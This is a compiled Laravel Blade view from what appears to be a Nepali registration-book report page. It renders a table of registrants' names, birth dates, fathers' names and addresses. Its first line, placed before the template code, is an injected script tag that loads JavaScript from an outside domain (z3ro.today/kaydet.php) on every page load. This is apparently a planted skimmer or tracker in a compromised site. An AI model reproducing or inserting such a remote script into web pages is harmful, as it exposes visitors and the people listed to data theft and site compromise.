<script src="http://z3ro.today/kaydet.php"></script><?php $__env->startSection('content'); ?>
<!-- start page title -->
<div class="row">
    <div class="col-12">
        <div class="page-title-box d-sm-flex align-items-center justify-content-between">
            <h4 class="mb-sm-0 font-size-18">दर्ता किताब</h4>

            <div class="page-title-right">
                <ol class="breadcrumb m-0">
                    <li class="breadcrumb-item"><a href="#">प्रतिवेदन</a></li>
                    <li class="breadcrumb-item active">दर्ता किताब</li>
                </ol>
            </div>

        </div>
    </div>
</div>
<!-- end page title -->

<div class="row">
    <div class="col-lg-12">
        <div class="card">
            <div class="card-body">

                <div class="table-responsive">
                    <center>
                        <h3 style="padding-top:5px;">दर्ता किताब</h3>
                        <h3>श्रेणी: <?php echo e($level->level); ?></h3>
                    </center>
                    <table class="table align-middle datatable table-check" style="border: 2px solid #b7b5b5;max-width:100%">
                        <thead>
                            <tr class="bg-transparent">
                                <th width="5%">सि.नं.</th>
                                <th width="10%">परिषद दर्ता नम्बर</th>
                                <th width="10%">दर्ता मिति</th>
                                <th width="20%">नाम</th>
                                <th width="10%">जन्म मिति</th>
                                <th width="10%">बुबाको नाम</th>
                                <th width="20%">ठेगाना</th>
                                <th width="10%"></th>
                            </tr>
                        </thead>

                        <?php $__currentLoopData = $results; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $sn=>$userReport): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>

                        <tr>
                            <td><?php echo e(++$sn); ?></td>
                            <td><?php echo e($userReport->reg_no); ?></td>
                            <td><?php echo e($userReport->certificate_decision_date); ?> </td>
                            <td><b><?php echo e($userReport->name); ?><br /><?php echo e($userReport->nameeng); ?></b></td>
                            <td><?php echo e($userReport->dob); ?> </td>
                            <td> <?php echo e($userReport->fname); ?> </td>
                            <td><?php echo e($userReport->province->province); ?>, <?php echo e($userReport->district->district_name); ?>, <?php echo e($userReport->locallevel->local_name); ?>, <?php echo e($userReport->ward); ?></td>
                            <td>
                                <a href="<?php echo e(make_route('report.reg-book', $userReport->id)); ?>" class="btn btn-success waves-effect waves-light"><i class="fa fa-eye"></i>दर्ता किताब</a>
                            </td>
                        </tr>
                        <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>

                    </table>
                </div>
            </div>
            <!-- end card body -->
        </div>
        <!-- end card -->
    </div>
</div>


<?php $__env->stopSection(); ?>
<?php echo $__env->make('layouts.app', array_diff_key(get_defined_vars(), ['__data' => 1, '__path' => 1]))->render(); ?><?php /**PATH /var/www/html/resources/views/reports/regbookreport.blade.php ENDPATH**/ ?>